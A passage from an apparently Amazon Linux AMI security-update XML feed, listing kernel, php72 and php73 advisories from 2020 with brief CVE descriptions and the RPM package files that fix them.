release="2.6.22.1.83.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.83.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.261-2.6.22.1.83.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.261" release="2.6.22.1.83.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.261-2.6.22.1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1366</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1366: important priority package update for kernel</title><issued date="2020-05-11 20:43:00" /><updated date="2020-06-17 23:45:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12826:
A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.
1822077: CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process
CVE-2020-12657:
An issue was discovered in the Linux kernel before 5.6.5. There is a use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body.
1832866: CVE-2020-12657 kernel: use-after-free in block/bfq-iosched.c related to bfq_idle_slice_timer_body
CVE-2020-10711:
A NULL pointer dereference flaw was found in the Linux kernel's SELinux subsystem in versions before 5.7. This flaw occurs while importing the Commercial IP Security Option (CIPSO) protocol's category bitmap into the SELinux extensible bitmap via the 'ebitmap_netlbl_import' routine. While processing the CIPSO restricted bitmap tag in the 'cipso_v4_parsetag_rbm' routine, it sets the security attribute to indicate that the category bitmap is present, even if it has not been allocated. This issue leads to a NULL pointer dereference while importing the same category bitmap into SELinux. This flaw allows a remote network user to crash the system kernel, resulting in a denial of service.
1825116: CVE-2020-10711 Kernel: NetLabel: null pointer dereference while receiving CIPSO packet with null category may cause kernel panic
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10711" title="" id="CVE-2020-10711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12657" title="" id="CVE-2020-12657" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12826" title="" id="CVE-2020-12826" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package 
name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.177" release="107.254.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.177-107.254.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1367</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1367: medium priority package update for php72</title><issued date="2020-05-08 20:28:00" /><updated date="2020-05-14 02:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7067:
In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), the urldecode() function can be made to access locations past the allocated memory, because it erroneously uses signed numbers as array indexes.
1827653: CVE-2020-7067 php: out-of-bounds read when using a malformed url-encoded string
CVE-2020-7066:
In PHP versions 7.2.x below 7.2.29, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using get_headers() with a user-supplied URL, if the URL contains a zero (\0) character, the URL will be silently truncated at it. This may cause some software to make incorrect assumptions about the target of the get_headers() call and possibly send some information to the wrong server.
1820604: CVE-2020-7066 php: information disclosure in function get_headers
CVE-2020-7064:
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while parsing EXIF data with the exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or a crash.
1820601: CVE-2020-7064 php: information disclosure in exif_read_data() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7064" title="" id="CVE-2020-7064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7066" title="" id="CVE-2020-7066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7067" title="" id="CVE-2020-7067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-pdo-dblib" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.30" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-dbg-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-imap" 
version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.30" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.30" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php72-common-7.2.30-1.22.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.30" release="1.22.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-dbg-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.30" release="1.22.amzn1" 
epoch="0" arch="i686"><filename>Packages/php72-json-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.30-1.22.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.30" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.30-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1368</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1368: medium priority package update for php73</title><issued date="2020-05-08 20:29:00" /><updated date="2020-05-14 02:16:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-7067:
In PHP versions 7.2.x below 7.2.30, 7.3.x below 7.3.17 and 7.4.x below 7.4.5, if PHP is compiled with EBCDIC support (uncommon), the urldecode() function can be made to access locations past the allocated memory, because it erroneously uses signed numbers as array indexes.
1827653: CVE-2020-7067 php: out-of-bounds read when using a malformed url-encoded string
CVE-2020-7066:
In PHP versions 7.2.x below 7.2.29, 7.3.x below 7.3.16 and 7.4.x below 7.4.4, while using get_headers() with a user-supplied URL, if the URL contains a zero (\0) character, the URL will be silently truncated at it. This may cause some software to make incorrect assumptions about the target of the get_headers() call and possibly send some information to the wrong server.
1820604: CVE-2020-7066 php: information disclosure in function get_headers
CVE-2020-7065:
In PHP versions 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while using the mb_strtolower() function with UTF-32LE encoding, certain invalid strings could cause PHP to overwrite a stack-allocated buffer. This could lead to memory corruption, crashes and potentially code execution.
1820627: CVE-2020-7065 php: by using mb_strtolower() function with UTF-32LE encoding leads to potential code execution
CVE-2020-7064:
In PHP versions 7.2.x below 7.2.9, 7.3.x below 7.3.16 and 7.4.x below 7.4.34, while parsing EXIF data with the exif_read_data() function, it is possible for malicious data to cause PHP to read one byte of uninitialized memory. This could potentially lead to information disclosure or a crash.
1820601: CVE-2020-7064 php: information disclosure in exif_read_data() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7064" title="" id="CVE-2020-7064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7065" title="" id="CVE-2020-7065" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7066" title="" id="CVE-2020-7066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7067" title="" id="CVE-2020-7067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-bcmath" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.17" 
release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package 
name="php73-soap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.17" release="1.25.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.17" release="1.25.amzn1" epoch="0" 
